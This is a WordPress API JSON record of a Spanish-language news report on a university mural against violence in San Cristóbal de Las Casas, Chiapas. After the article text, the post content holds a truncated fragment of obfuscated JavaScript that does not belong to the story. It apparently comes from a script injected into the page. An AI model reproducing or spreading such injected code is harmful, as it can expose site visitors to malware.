{"id":11976,"date":"2023-09-26T04:45:39","date_gmt":"2023-09-26T04:45:39","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=11976"},"modified":"2023-09-26T04:45:39","modified_gmt":"2023-09-26T04:45:39","slug":"develan-mural-no-a-la-violencia-si-a-la-paz","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=11976","title":{"rendered":"Develan mural \u201cNo a La Violencia, S\u00ed a la Paz\u201d"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-5.11.46-PM-1-1024x683.jpeg\" alt=\"\" class=\"wp-image-11977\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-5.11.46-PM-1-1024x683.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-5.11.46-PM-1-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-5.11.46-PM-1-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-5.11.46-PM-1-1536x1024.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/09\/WhatsApp-Image-2023-09-25-at-5.11.46-PM-1.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal25 de septiembre del 2023.:San Crist\u00f3bal de Las Casas.- El Rector de la Universidad Intercultural de Chiapas (Unich), Dionicio Toledo Hern\u00e1ndez, en coordinaci\u00f3n con Alma Gabriela Siu Rodas, Titular de la Unidad de Enlace de Igualdad de G\u00e9nero, inauguraron un mural que denominaron \u201cNo a La Violencia, S\u00ed a la Paz\u201d, el cual busca promover las acciones al d\u00eda 25 de cada mes, donde se conmemora el D\u00eda Naranja.El D\u00eda Naranja busca movilizar a la opini\u00f3n p\u00fablica y a los gobiernos para emprender acciones concretas con el fin de promover y fomentar la cultura de la no violencia. El D\u00eda Naranja y la Campa\u00f1a Naranja buscan movilizar a la opini\u00f3n p\u00fablica y a los gobiernos para emprender acciones concretas con el fin de promover y fomentar la cultura de la no violencia. \u201cComo todos sabemos un \u00e1rbol tiene varios significados principalmente representa el ciclo de la vida, el tronco representa las bases y los valores que tenemos, las ramas simbolizan las decisiones y caminos que vamos tomando, las hojas significan el cambio y el crecimiento de cada persona, por lo que, con este \u00e1rbol queremos que una de las decisiones que tomemos sea poner un alto a la violencia, que en nuestras acciones no haya violencia, que haya armon\u00eda, respeto, tolerancia y que juntos trabajemos por una cultura de paz\u201d, dijo Alma Gabriela Siu.Este 25, la UNICH, realiz\u00f3 la pinta de manos naranjas, el cual busca generar conciencia y prevenir la violencia contra mujeres y ni\u00f1as, y dejar un mural, busca que las personas que lo vean, sepan que hay un motivo por este color que es el naranja.Este mural, cont\u00f3 con las leyendas: \u201cEducar en la igualdad y el respeto es educar contra la violencia\u201d y \u201cLas diferencias nos enriquecen\u2026el respeto nos une\u201d, las cuales fueron puestas en lenguas originarias Tzeltal y Cho\u00b4l.Este mural fue elaborado por los docentes Edgar Federico P\u00e9rez Mart\u00ednez y  Edit Araceli. P\u00e9rez Mart\u00ednez, as\u00ed como los estudiante Alan V\u00e1zquez G\u00f3mez,  Jos\u00e9 Ren\u00e9 L\u00f3pez Vel\u00e1zquez, Carlos Daniel S\u00e1nchez V\u00e1zquez, Emelyn Yacel Pale Velez,  Henry Maximiliano Cabrera , Diana Gabriela S\u00e1ntiz Gonz\u00e1lez, Juan de Dios G\u00f3mez S\u00e1ntiz, Jes\u00fas Rangel G\u00f3mez P\u00e9rez, y Alberto Enrique Robles Ramos<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal25 de septiembre del 2023.:San Crist\u00f3bal de Las Casas.- El Rector de la Universidad Intercultural de Chiapas (Unich), Dionicio Toledo Hern\u00e1ndez, en coordinaci\u00f3n con Alma Gabriela Siu Rodas, Titular de la Unidad de Enlace de Igualdad de G\u00e9nero, inauguraron un mural que denominaron \u201cNo a La Violencia, S\u00ed a la Paz\u201d, el cual busca &hellip;<\/p>\n","protected":false},"author":2,"featured_media":11977,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-11976","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11976","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11976"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11976\/revisions"}],"predecessor-version":[{"id":11978,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/11976\/revisions\/11978"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/11977"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11976"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11976"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11976"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}